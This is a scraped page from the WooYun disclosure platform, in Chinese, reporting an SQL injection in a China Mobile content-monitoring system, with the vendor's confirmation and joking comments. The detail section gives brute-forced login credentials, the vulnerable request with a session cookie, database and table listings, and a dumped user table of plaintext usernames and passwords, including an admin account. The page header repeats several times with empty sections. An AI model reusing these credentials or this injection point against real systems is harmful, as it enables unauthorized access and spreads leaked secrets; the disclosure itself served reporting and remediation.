中国移动不良信息拨测系统SQL注入漏洞(内容让人羞羞)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152395

漏洞标题：中国移动不良信息拨测系统SQL注入漏洞(内容让人羞羞)

漏洞作者：路人甲

提交时间：2015-11-06 18:22

修复时间：2015-12-25 10:32

公开时间：2015-12-25 10:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-06：细节已通知厂商并且等待厂商处理中
2015-11-10：厂商已经确认，细节仅向厂商公开
2015-11-20：细节向核心白帽子及相关领域专家公开
2015-11-30：细节向普通白帽子公开
2015-12-10：细节向实习白帽子公开
2015-12-25：细节向公众公开

简要描述：

中国移动不良信息拨测系统sql注入漏洞

详细说明：

**.**.**.**:11222/ncss/
爆破之
wanghua 123456

GET /ncss/auditmana/webTree.do?tr=listWebSites&treeId=**.**.**.*** HTTP/1.1
Host: **.**.**.**:11222
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=8D4D5550134B823EFFF04AEF85533DCE
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

available databases [3]:
[*] information_schema
[*] ncss
[*] test

Database: ncss                                                                                                         
[1020 tables]
+---------------------------------+
| acquisition_conf_policy         |
| alarm_forward_info              |
| alarm_info                      |
| alarm_msg_his                   |
| alarm_msg_info                  |
| alarm_msg_per                   |
| alarm_policy                    |
| alarm_report_datas              |
| alarm_report_his                |
| alarm_report_info               |
| alarm_rule                      |
| area_info                       |
| audit_statinfo                  |
| audit_user_count                |
| con_test                        |
| daily_audit_time_report         |
| data_storage_sheet              |
| day_audit_time_report           |
| day_bidwinning_amount           |
| day_hostname_stat               |
| day_hostname_stat_0111          |
| day_report_audit_area_monitor   |
| day_report_audit_info           |
| day_report_audit_visitsrank     |
| day_server_stat                 |
| day_work_load_report            |
| department                      |
| domain_tree                     |
| downloadblack                   |
| equip_conf_send_status          |
| evidence                        |
| evidence_video                  |
| front_acquisition_policy        |
| front_image_policy              |
| front_info                      |
| front_keyword_policy            |
| front_text_policy               |
| host_display                    |
| host_reason                     |
| host_time_baseinfo              |
| hostname_test                   |
| hour_hostname_0105rd            |
| hour_hostname_stat              |
| hour_server_stat                |
| idc_room                        |
| image_conf_policy               |
| image_conf_send_status          |
| ip_area                         |
| keyword                         |
| keyword_conf_policy             |
| keyword_conf_send_status        |
| keyword_copy                    |
| keyword_policy_type             |
| keyword_type                    |
| log_black_list_submit           |
| log_black_list_submit_item      |
| log_record                      |
| log_sys_record                  |
| mobile_area                     |
| month_bidwinning_amount         |
| month_hostname_stat             |
| month_server_stat               |
| ncss_user                       |
省略...

Table: ncss_user
[3 entries]
admin jhkj9527
wanghua 123456
yaotingting 123

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-11-10 10:30

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

漏洞评价：

2015-11-06 18:24 | 浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 哈！躁起来！)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-11-06 20:03 | 随风的风 ( 普通白帽子 | Rank:180 漏洞数:60 | 微信公众号：233sec 不定期分享各种漏洞思...)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-11-07 12:54 | 一只猿 ( 普通白帽子 | Rank:509 漏洞数:92 | 硬件与无线通信研究方向)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-11-08 15:54 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-11-10 09:15 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:52 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-11-10 11:00 | 恶魔小西瓜 ( 路人 | Rank:3 漏洞数:2 )

@乌云首席鉴黄师这个漏洞应该你来审核
2015-11-10 11:16 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-12-25 10:47 | 随缘 ( 路人 | Rank:2 漏洞数:2 | 宁缺毋滥。)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-12-25 10:48 | 枫子 ( 路人 | Rank:6 漏洞数:2 | 做一枚安全界执着行走的酱油鸟。)

@乌云首席鉴黄师这个漏洞应该你来审核
2015-12-25 10:53 | 神在堕落 ( 路人 | Rank:5 漏洞数:5 | 不知伊何处，醉舞向山行)

@乌云首席鉴黄师这个漏洞应该你来审核

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152395

漏洞标题：中国移动不良信息拨测系统SQL注入漏洞(内容让人羞羞)

相关厂商：中国移动

漏洞作者：路人甲

提交时间：2015-11-06 18:22

修复时间：2015-12-25 10:32

公开时间：2015-12-25 10:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152395

漏洞标题：中国移动不良信息拨测系统SQL注入漏洞(内容让人羞羞)

相关厂商：中国移动

漏洞作者： 路人甲

提交时间：2015-11-06 18:22

修复时间：2015-12-25 10:32

公开时间：2015-12-25 10:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152395"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云